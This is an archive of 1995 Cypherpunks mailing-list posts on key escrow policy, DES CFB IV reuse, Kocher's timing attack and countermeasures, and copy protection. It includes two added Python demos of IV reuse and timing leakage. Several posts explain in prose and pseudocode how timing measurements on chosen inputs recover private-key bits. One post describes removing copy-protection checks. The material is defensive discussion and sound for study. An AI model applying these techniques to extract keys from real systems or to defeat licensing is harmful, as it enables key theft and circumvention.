key(s) is escrowed in accordance with #3."

Worse, IMHO, is criteria #9, which states " ... cryptographic functions
shall interoperate only with key escrow cryptographic functions in products
that meet these criteria..."

The interoperability issues stayed muddy. The government didn't spend much
effort making it clearer. The karma seemed to be that if you had two
products, say Webscape 128 and Webscape 64/Gak, selling 128 domestically
and 64/GAK exported, that you can't make Webscape128 interoperate with
64/GAK unless the Webscape128 keys are GAKed.

Part of this is buried in agent criteria #6, "6. Escrow agent entities that
are certified by the U.S. government shall work with developers of key
escrow encryption products to develop and support a feature that allows the
product to verify to one another that the product's keys have been escrowed
with a U.S.-certified agent."

Looks to me like the software has to chase up the chain of certification
authorities (or escrow authorities if you prefer) before it can work.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 1995 14:06:28 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: DES Cryptanalysis
In-Reply-To: <30cc40ff3f57002@noc.cis.umn.edu>
Message-ID: <199512112328.SAA06771@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Kevin L. Prigge writes:
> I'm looking for pointers, or perhaps an explanation of the statement
> I found in Applied Cryptography (section 9.6) where it implies
> that if the IV is not unique in CFB mode, the cryptanalyst can recover the
> plaintext.
> 
> The reason that this interests me is that I have a file, encrypted
> with DES in CFB mode. I believe I know the first 8 bytes of plaintext
> and I also know the IV used. 

I don't believe you have much cause for hope here. The IV usually accompanies
the ciphertext in the clear. Knowing the first 8 bytes of plaintext gives you
precious little additional information in CFB mode, for the purposes of
decryption. (It looks like you might be able to reconstruct the ciphertext
of the encrypted IV, giving you a single plaintext/ciphertext pair, but that's
about it....)

Generally it's advisable to use a different IV for each encryption to avoid 
correlations between the ciphertexts for plaintexts that have the same 
prefix. If you always used the same IV, then two messages that start with the
same text would encrypt to the same initial piece of ciphertext. (This is not
the only reason, but I think it's the main one.)

-Futplex <futplex@pseudonym.com>
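
The IV-reuse behaviour discussed in the message above, as an added example (not part of the original post). Python's standard library has no DES, so a keyed PRF (HMAC-SHA256 truncated to 8 bytes) stands in for the block cipher; CFB only ever runs the cipher in the forward direction, so the mode behaves the same. The key, IVs and messages are constructed sample values.

```python
import hashlib
import hmac

BLOCK = 8  # 64-bit blocks, as with DES


def _E(key, block):
    # Stand-in for DES encryption of one block (assumption: keyed PRF).
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def cfb_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        ct = _xor(plaintext[i:i + BLOCK], _E(key, prev))  # C_i = P_i xor E(C_{i-1})
        out += ct
        prev = ct
    return out


def cfb_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        chunk = ciphertext[i:i + BLOCK]
        out += _xor(chunk, _E(key, prev))
        prev = chunk
    return out


def shared_prefix_len(a, b):
    """Number of leading bytes two ciphertexts have in common."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def encrypted_iv_from_known_block(first_plain, first_cipher):
    """Known first block gives E_K(IV): one plaintext/ciphertext pair, no more."""
    return _xor(first_plain, first_cipher)


# Constructed sample data.
KEY = b"sample-key-not-secret"
IV = bytes.fromhex("0001020304050607")
IV2 = bytes.fromhex("f0e1d2c3b4a59687")
PREFIX = b"INVOICE 1995-12 "          # 16 bytes = two full blocks
M1 = PREFIX + b"pay 100 "
M2 = PREFIX + b"pay 900 "

if __name__ == "__main__":
    c1, c2 = cfb_encrypt(KEY, IV, M1), cfb_encrypt(KEY, IV, M2)
    print("same IV, shared ciphertext bytes:", shared_prefix_len(c1, c2))
    # In the first differing block the keystream is identical, so the
    # ciphertext difference equals the plaintext difference.
    print("xor of third blocks:", _xor(c1[16:24], c2[16:24]).hex())
    c3 = cfb_encrypt(KEY, IV2, M2)
    print("fresh IV, shared ciphertext bytes:", shared_prefix_len(c1, c3))
```

With a repeated IV the ciphertexts match up to the first differing plaintext byte, and the first differing block also reveals the XOR of the two plaintext blocks. A per-message IV removes both effects.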





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 12 Dec 1995 14:05:35 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <9512120039.AA00574@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Pat Farrell writes in his report on the NIST GAK meeting:
>>Geoff said that they may want legislation support for
>>protecting against illegal release of keys, failure to release, etc.

Jim Bell Responds:
>  Pardon me, but since this "key escrow" system was always claimed
>  to be "voluntary," then how can there be any kind of legal penalties
>  associated with "failure to release" those keys?

well, since the subject at hand is Escrow Agent Criteria, "Geoff" is probably  
talking about the failure of an escrow agent to release a key upon production  
of "lawful authorization" ....


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 11 Dec 1995 17:55:55 +0800
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.951211192419.28608P-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Anonymous wrote:
> pck@netcom.com (Paul C. Kocher) writes:
> I just read this paper, and while it is somewhat interesting, I
> don't think the walls of cryptography are in any danger of
> crumbling.
...
> So while this is a very nice piece of work, and certainly of
> theoretical interest, I don't think it will modify the way in
> which people are advised to utilize cryptographic software, or
> cause companies like Netscape or RSADSI to shed any tears.

Read the SKIP spec (SKIP is Sun's IP level encryption protocol).  It uses
Diffie-Hellman certificates.  That means fixed secret DH keys being used
in routers.  It is hard to think of a better target for this type of
attack.  I have not done a complete read of the SKIP specification (only a
quick scan) so I could be wrong about SKIP but DH certificates sound like
a very very bad idea.  The other source for attack would be any networked
service that is on a local network.  Single user machines are far better
targets than multi-user systems.  That Web server sitting idle not doing
much, repeatedly hit it with https requests and if you are on a local
network, you should be able to get very good timing information. 

I for one will probably add a flag for conditional compilation of my 
bignumber library so that it will take constant time.  This may be a %10 
slow down (using small windows exponentiation) which is trivial compared 
to the %30 speedup I will probably get when I implement a faster mod 
function :-).

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 14:55:20 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC9B8C.6201@netscape.com>
Message-ID: <199512120100.UAA00263@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> Perry E. Metzger wrote:
> > The trivial way to handle this is simply to check user time with the
> > right system calls and make sure it always comes out the same with an
> > appropriate number of sleeps.
> 
> The problem with that approach is that if the system is heavily loaded,
> it can take an arbitrarily large amount of user time.

Totally untrue. The process can take an arbitrary amount of wall clock
time, not user time.

In the case of the heavily loaded machine, the problem is gone -- the
opponent can't precisely predict this. Provided you take the same
amount of process time no matter what, you are okay.

(To be technical, user time doesn't pass during sleeps, but that
doesn't matter -- the problem gets fixed anyway).

> Somewhat better is to sleep for a random amount of time after you're
> done.

I don't think so. First of all, you can still extract some
information. If you have been gone as long as the maximum computation
plus the maximum random fudge, you know that you had to have conducted
the maximum computation. This means that some bits are indeed
leaking. Your approach also has the disadvantage that it is hard to
produce good random numbers -- you are perhaps familiar with that problem?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 1995 12:53:35 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Timing Attacks
In-Reply-To: <199512120026.QAA19309@ix12.ix.netcom.com>
Message-ID: <199512120111.UAA00312@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:
> The attack also works better if you can try it multiple times with the same 
> numbers to work around random latency; the lowest number is closest to real.

Other statistical techniques can be used to get around random network
latency. Anyone who's used NTP is aware of the possibilities...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 12 Dec 1995 15:22:58 +0800
To: daw@bamako.CS.Berkeley.EDU (David A Wagner)
Subject: Re: More FUD from First Virtual [NOISE]
In-Reply-To: <199512112215.RAA13271@bb.hks.net>
Message-ID: <199512120519.VAA09715@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Maybe Sameer will create a Hack FV page :-)

	FV isn't worth it.

	Actually, Hack FV seems pretty pointless. Someone hacks FV,
and a chargeback is issued on the credit card. Big deal. Same old
outdated credit-card based payment systems.
	No more secure than credit cards.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 12 Dec 1995 05:04:23 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC02F5.4487@netscape.com>
Message-ID: <Pine.SOL.3.91.951211204336.28608R-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Tom Weinstein wrote:
> Careful.  Even if you can make the number of executed instructions the
> same, you still have to worry about timing differences due to branches
> and the way the hardware multiplier handles different operands.

Granted.  For my particular library, there are no major 'if statements' I 
believe (I'll check) after you get out of the mod_exp function and into 
the mod and mul sub parts.  As for the multiplier, I just had a look at 
my old 386 book and yup, it does take an argument dependent time... I've 
been around pipelined RISC cpus too long...

eric 
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 16:32:51 +0800
To: cypherpunks@toad.com
Subject: Re: More FUD from First Virtual [NOISE]
Message-ID: <199512120654.WAA17948@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:19 PM 12/11/95 -0800, sameer wrote:
>> Maybe Sameer will create a Hack FV page :-)
>
>	FV isn't worth it.
>	Actually, Hack FV seems pretty pointless. Someone hacks FV,
>and a chargeback is issued on the credit card. Big deal. Same old
>outdated credit-card based payment systems.
>	No more secure than credit cards.

Besides, if you hack FV you've got the money :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Tue, 12 Dec 1995 16:36:30 +0800
To: cypherpunks@toad.com
Subject: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512120710.CAA07438@mail-e1b.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Netscape Communications has awarded two software sleuths $1,000 each for
finding security gaps in its Netscape Navigator 2.0 software.  The company
also awarded gifts to 50 other contestants in its "Bugs Bounty" program for
identifying non-security problems.  (Wall Street Journal 11 Dec 95 B7)
Meanwhile, Netscape has vowed to wage a "dogfight" with Microsoft in setting
standards for Internet software.  CEO James Barksdale says his company will
continue to develop products that operate independently of any particular
computer operating system, noting that, "We offer freedom to the masses.
It's a tough fight -- I'll grant you that -- but we're brave.  We're well
financed.  We believe that God is on our side."  (Investor's Business Daily
11 Dec 95 A7)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 16:52:15 +0800
To: gibo@ripco.com (Giles Bowkett)
Subject: Re: Timing Attack Paper
Message-ID: <199512120729.XAA21395@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 PM 12/11/95 CST, gibo wrote:
>I went to
>
>http://www.cryptography.com/timingattack.html
>
>and found the whole thing to be totally incomprehensible from
>a layman's point of view.  I apologize for having not read
>"Applied Cryptography", which might have made the abstract a
>simpler read - but even if I had I'd have been baffled by a
>lot of the terminology and equations in this paper.
>
>Can anyone post a brief summary which explains the essential
>workings of the attack?  I'd be very grateful.

Briefly, most public-key calculations are _slow_, and use
512-2048-bit numbers which get represented as arrays of
machine integers. The amount of time they take depends on the values
you're multiplying together, especially because the algorithms
used to do the arithmetic less slowly take shortcuts whenever
possible to avoid unnecessary work.  If you watch the time
that it takes for a machine to do calculations using its private
keys, for some algorithms you can guess a bit or two of the key.
If you're clever, and have the ability to feed the victim
different numbers for it to calculate on (e.g. make a bunch
of connections using Diffie-Hellman), you can guess different
bits each time, and gradually get the whole thing.

It helps to watch this a number of times to get better statistics,
so you can tell what's real calculation and what's just speed-randomness.
Obviously, it also helps if you're running a program on the same
machine as the target you're trying to hit, but you can still gain
some information if you're running across a network and having to
estimate random network delays.  In these cases, you just have to 
watch longer to get stats.

A common algorithm for doing modular exponentiation (the core
of the Diffie-Hellman and RSA algorithms) looks like this:

To calculate y**x mod m  (all this arithmetic is multiple-precision)
(and maybe there's an off-by-one error or two in this :-)
This uses successive squaring to do the calculation in log2(x) time
instead of just doing x multiplies by y, which would be very slow
since x is typically 500-1000 bits long...  Remember that
multiplying two 1024-bit numbers typically involves multiplying two
arrays of 32 numbers 32 bits long, which takes 32*32 or 1024 multiply steps.
And modulo calculations are also slow.
        prod = 1
        square = y
        log2x = number of bits in x
        for i = 1 to log2x+1  {
                if (x odd) then {
                        prod = prod * square
                        if ( prod > m ) then prod = prod mod m
                }
                # else if (x even), don't bother
                square = square * square
                if (square > m) square = square mod m
                x = x / 2
        }

You can figure out the timing for the squaring calculations yourself.
Since you get to pick y, you can manipulate it to guess a bit about
how long x is, and notice from the different timings how many
times there was a prod*square calculation (which tells you how many
bits were odd), as well as how many prod mod m calculations.

You can get a certain amount of defense by keeping around prod1 and prod2,
and calculating prod1 = prod1 * square (the real value) for odd
and prod2 = prod2 * square (a dummy you'll discard later) for even,
and doing something useful to obscure the mod m calculations,
like keeping a dummy around to divide if prod1 or prod2 is less than m.
Aside from slowing things down by 50%, if you're not careful, there's
still information that leaks from the timing.  

For other algorithms, sometimes the calculations you've got to do timings
on are more subtle, like DES, but you can still often guess things,
and Paul gives a bunch of calculations for these.  They're more statistical,
since the effects you're chasing are subtler, but you still get information.


#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 12 Dec 1995 15:19:07 +0800
To: "Martin Diehl" <mdiehl@dttus.com>
Subject: Re: Re[2]: Timing Cryptanalysis Attack
Message-ID: <199512120558.XAA02070@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 12/11/95 CST, Martin Diehl wrote:

>     OTOH, maybe we _should_ try for constant computation time and then try 
>     for *random* delay time.  Remember that _we_ will spend a lot of real 
>     time arguing whether the *random* delay is really _random_
Does it necessarily matter whether the random delay time is true-random?
The idea is to obfuscate the time of the whole computation.  As long
as you don't base your random numbers on the system clock, it should
serve its purpose.  (I omit the system clock because timing seems to be
the nexus of the whole attack, so we can safely assume that the clock's
data, and thus its source of "randomness," can be predicted.)
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Quote: "And if we change, well, I'll love you anyway" - Alice In Chains
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@unix.ka9q.ampr.org>
Date: Tue, 12 Dec 1995 18:23:46 +0800
To: cypherpunks@toad.com
Subject: Plaintiff's Opposition in Karn vs State Dept
Message-ID: <199512120910.BAA05272@unix.ka9q.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


On Monday, December 11, my attorneys filed a Plaintiff's Opposition to
Defendants' Motion to Dismiss in the case of Karn vs US Dept of State
et al.

I have HTMLized our filings and added them to my web page. Please feel
free to peruse them. Also, let me know if you spot any obvious typos;
I had to do quite a bit of manual editing, particularly in the
footnotes, to make the result look good in HTML.

The government now gets the chance to answer our opposition. They were
originally scheduled to do so by December 13, but since our own filing
was delayed over the weekend by the judge's concurrence the government
will probably get a few extra days to respond.

Note that we have asked to make oral arguments on the motion. I'll let
everyone know if or when this will happen.

The web page is:

http://www.qualcomm.com/people/pkarn/export


Phil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Tue, 12 Dec 1995 16:56:56 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Attacks
In-Reply-To: <9512112205.AA07602@toad.com>
Message-ID: <30cd30bd.1863868@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995 17:04:56 -0500 (EST), Eli Brandt wrote:

> Also, it's not just networked machines.  Smart cards may have a hard
> time defending themselves against hostile card readers.  They're slow
> already; the user may not appreciate the extra time spent for
> obfuscation.  (This depends critically on the numbers, of course.)

Smart cards have one major advantage, though.  During these types of
operations, a smart card will be totally dedicated to the crypto.
Calculating the maximum possible delay for a given key size should be
relatively easy.

Most single-chip micros also have a timer that could be readily
dedicated to counting out this maximum possible delay, and the result
held only that long.  This could, on an 8051 (as a fairly typical
example) be easily controlled (with a 1-instruction loop) to within 2
instruction cycles.  Given another dozen or so instructions, it can be
controlled to a single fixed delay.

Where minimum and maximum delays only differ by 1% or so for a given
key size, no one will ever notice the extra time required to hold the
result for the maximum possible delay.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Dec 1995 06:44:09 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: GAK and self-incrimination?
In-Reply-To: <199512102233.AA10816@ideath.goldenbear.com>
Message-ID: <199512110944.EAA14913@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles writes:
> But it seems to me that the real bottom line is that the information which
> is compelled is not incriminating, and the information which is
> incriminating is not compelled. The keys to my crypto might lead to
> incriminating evidence, or they might prove to be useful in a prosecution,
> but they're not in themselves any sort of a signal that a crime has been or
> will be committed.

Written half in jest: Well, the cries from the TLAs of "Why do you want to
use cryptography ?  What do you have to hide ?" notwithstanding....

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 Dec 1995 11:34:14 +0800
To: cypherpunks@toad.com
Subject: KOC_her
Message-ID: <199512111231.HAA02647@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-11-95. NYPaper Page One:


   John Markoff reports on Paul Kocher's paper on the timing
   attack vulnerability of public-key encryption. Quotes Matt
   Blaze, Bruce Schneier, Ron Rivest, Martin Hellman, James
   Bidzos.

   KOC_her (11 kb)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 13 Dec 1995 05:54:04 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <0kn1kjCMc50e02ivZP@nsb.fv.com>
Message-ID: <199512111920.LAA24338@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Nathaniel Borenstein <nsb@nsb.fv.com> writes:
> Hey, don't go for constant time, that's too hard to get perfect.  Add a
> *random* delay.  This particular crypto-flaw is pretty easy to fix. 
> (See, I'm not *always* arguing the downside of cryptography!)

Random delay may be harder to get perfect than constant time.  Note that
the actual time for the transaction is the minimum of all the transaction
times you measure, since you can't add a negative delay to them.  It's
presumably even easier if the random distribution is known.  Adding a
random delay means more transactions are required to find each new bit,
but information is still leaking.

> It is worth noting, however, the extent to which "secure" cryptographic
> protocols keep needing to get fixed one last time....  -- Nathaniel

Amen...

	Jim Gillogly
	Trewesday, 21 Foreyule S.R. 1995, 19:16
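
Added example, not part of any message in this archive: a toy simulation comparing the random delay Borenstein proposes with the fixed worst-case hold John Lull describes, showing Gillogly's point that the minimum of many measurements strips a random delay. The tick values, function names and sample counts are constructed assumptions.

```python
import random

# Constructed toy model (not from the thread): a private-key operation
# whose running time depends on one secret bit, in arbitrary clock ticks.
BASE_TICKS = 1000                       # time when the secret bit is 0
BIT_PENALTY = 50                        # extra ticks when the secret bit is 1
WORST_CASE = BASE_TICKS + BIT_PENALTY   # longest possible operation
MAX_JITTER = 500                        # upper bound of the added random delay


def raw_time(secret_bit):
    """Ticks the unprotected operation takes."""
    return BASE_TICKS + (BIT_PENALTY if secret_bit else 0)


def with_random_delay(secret_bit, rng):
    """Random-delay countermeasure: add a uniform, non-negative delay."""
    return raw_time(secret_bit) + rng.randrange(0, MAX_JITTER + 1)


def with_fixed_hold(secret_bit, rng):
    """Fixed-hold countermeasure: release the result only at WORST_CASE.

    rng is unused; it is accepted so both countermeasures share a signature.
    """
    elapsed = raw_time(secret_bit)
    return elapsed + (WORST_CASE - elapsed)


def observed_minimum(respond, secret_bit, samples, seed):
    """Smallest of `samples` timings, which is what filters out added delay."""
    rng = random.Random(seed)
    return min(respond(secret_bit, rng) for _ in range(samples))


def leak(respond, samples=2000):
    """Difference in observed minimum between secret bit 1 and secret bit 0.

    A value near BIT_PENALTY means the secret-dependent time survives the
    countermeasure; 0 means the observer sees nothing secret-dependent.
    """
    t0 = observed_minimum(respond, 0, samples, seed=1)
    t1 = observed_minimum(respond, 1, samples, seed=2)
    return t1 - t0


if __name__ == "__main__":
    # More samples make the random-delay estimate converge on BIT_PENALTY,
    # while the fixed hold stays at zero for any sample count.
    for n in (1, 10, 100, 2000):
        print(n, leak(with_random_delay, n), leak(with_fixed_hold, n))
```

The fixed hold only closes the response-time channel; Kocher's caveat about other observable signs of when the computation finishes still applies.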




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Wed, 13 Dec 1995 11:33:21 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512112111.NAA02653@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Kocher says this about padding to constant time:

> ... If a timer is used to delay returning results until a pre-specified
> time, attackers may be able to monitor other aspects of the system
> performance to determine when the cryptographic computation completes.

Perhaps, but an attack would be much more difficult if the monitoring must
be done outside the host doing the computation (viewing a router from
the outside, say, as Eric Young alludes to), since the scope for covert
channels is much reduced.

Peter Monta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Wed, 13 Dec 1995 11:33:40 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: EPIC Files Suit to Obtain C
Message-ID: <n1393432005.5337@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


Per various people's requests, I'm only putting this piece on the list. You
can get the rest of the newsletter at www.epic.org/alert/

-dave

>From the EPIC Alert 2.16

=======================================================================
[2] EPIC Files Suit to Obtain Gov't Crypto Report
=======================================================================

EPIC filed suit on December 4 against the U.S. Department of Commerce
under the Freedom of Information Act to force the release of a survey
conducted by the Department on the foreign availability of encryption
software. According to Secretary of Commerce Ron Brown the study has 
been completed and is being held up by the White House Office of 
Science and Technology Policy and the National Security Agency, the 
two agencies most strongly pushing the Mandatory Key Escrow (MKE) 
initiative.

Observers believe that the report will confirm the existence of a
substantial amount of commercial and free software available from
non-U.S. companies worldwide. An ongoing survey conducted by the
Software Publishers Association has found over 450 products from 27
countries. Of those products, 179 use the U.S. Data Encryption Standard
(DES). The existence of a substantial amount of commercial software
overseas cuts against arguments that export controls on encryption
software should be maintained.

The report was created after Congress decided not to pass legislation
last year that would have relaxed export controls on encryption. 
The legislation would have required the Department of Commerce to 
complete the foreign availability report by April 1995. Although the 
legislation was not enacted, the Commerce Department nonetheless agreed 
to conduct the study.

More information on U.S. Cryptography Policy is available at: 

   http://www.epic.org/crypto/

In a related development EPIC Legal Counsel David Sobel appeared before
the National Institute of Standards and Technology on December 5th to 
offer comments on NIST's "Draft Export for Key Escrow Encryption". Sobel
blasted the latest proposal for Mandatory Key Escrow (MKE) and said that 
the administration continues to ignore the interests of the public.  

EPIC also put forward seven recommendations to reform national 
cryptography policy.  The recommendations follow from a presentation to
the National Research Council earlier this year.  The EPIC Statement on 
the NIST standard and the  EPIC proposal for cryptography policy is 
available at:

  http://www.epic.org/crypto/EPIC_Statement.html
  


_________________________________________________________________________
Subject: EPIC Files Suit to Obtain Crypto...
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Dec 1995 05:53:55 +0800
To: Matt Blaze <mab@crypto.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111906.OAA01139@crypto.com>
Message-ID: <199512111944.OAA02490@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze writes:
> >The trivial way to handle this is simply to check user time with the
> >right system calls and make sure it always comes out the same with an
> >appropriate number of sleeps.
> 
> Of course, this works against a remote adversary, but not against one
> on the same machine who can look at actual CPU consumption (which doesn't
> increase when the target is blocked).

True enough, but using busy loops could handle that. However, I must
admit to being far more interested in handling the remote case
efficiently, especially given concerns people have about using
Photuris like systems on heavily pounded servers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 13 Dec 1995 05:54:04 +0800
To: "Rev. Ben" <samman-ben@cs.yale.edu>
Subject: Re: Timing Attacks
In-Reply-To: <Pine.A32.3.91.951211141205.26486F-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <199512112011.PAA01501@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>I'm not so sure I see the great usefulness of this attack.
>
>I've taken a cursory glance at Mr. Kocher's paper on-line and what it 
>comes down to essentially, if I understand it correctly, is that you need 
>to be as sure of the timing as you can be.
>
>Now, on a distributed system, you can't measure those timings, because 
>any latency  could come from the originating computer, the links in the 
>middle or any combination of them.
>
>Also precise timings can be limited by fluctuating load averages amongst 
>other things in a time-sharing computing environment.  While this might 
>work in a lab, with the current advances in computing speed, the 
>differences between a fast and a slow calculation can easily be opaqued 
>by network lag.
>
>Am I missing something, or does this attack only work in a lab?
>

The more timing noise between the attacker and the target, the
harder it is to exploit the measurements.  Based on some (very
rough) experiments I've set up here, I suspect the attack is easy
if you're on the same computer (and measure CPU load), probably
feasible if you're on the same network and the host and net are
unloaded, and unlikely otherwise.  The attack is especially
interesting against crypto tokens that are supposed to hold a secret
key secret, where you can get very close and take very good timing
measurements.

Keep in mind also that Kocher's results are only the first cut,
based on a very simple statistical model.  I suspect we'll be seeing
many improvements and variations over the coming months.

Bottom line is that implementing good cryptosystems is a lot harder
than one might think...

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Wed, 13 Dec 1995 05:53:57 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] anti-copy
In-Reply-To: <199512110852.DAA15235@opine.cs.umass.edu>
Message-ID: <9512112112.AA03120@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



futplex@pseudonym.com said:
>> Daark writes: How would it be possible to create files that KNOW they 
>> are  a copy?  

> It's not, to the great dismay of the Software Publishers Association 
> (or  whatever they're called). 

Not to pick nits, but I was deeply into cracking^h^h^hbacking up 
software in the 80's, when I got my first Apple II complete with
4K of RAM.

There are several schemes of copy protection that were used, like strange
sector/track interleaving, and burning the floppies with lasers to
render certain sectors unreadable/writable.  The program would attempt
to read that area of the disk, and if it couldn't it was on the original
media.  

Of course, this was in the days before 20MB MFM drives became the rage,
when Woz was king.

I guess the only way for a program to know if it was a copy
would be to have itself figure out what track/sector it is on and inject
and/or compare that information into the executable.  But since this 
information is no longer easy to come by as operating systems become 
more protected, this wouldn't be viable.  Especially if you take into
account that disks go bad, and backups are needed.

More importantly, it would be very easy to hunt down and replace with 
NOPs.  More so than taking out the dreaded, "enter the phrase on line
3 on page 25 on your manual..."

To summarize, it's possible (under _some_ operating systems), but it is 
not a good solution to the problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 13 Dec 1995 05:53:54 +0800
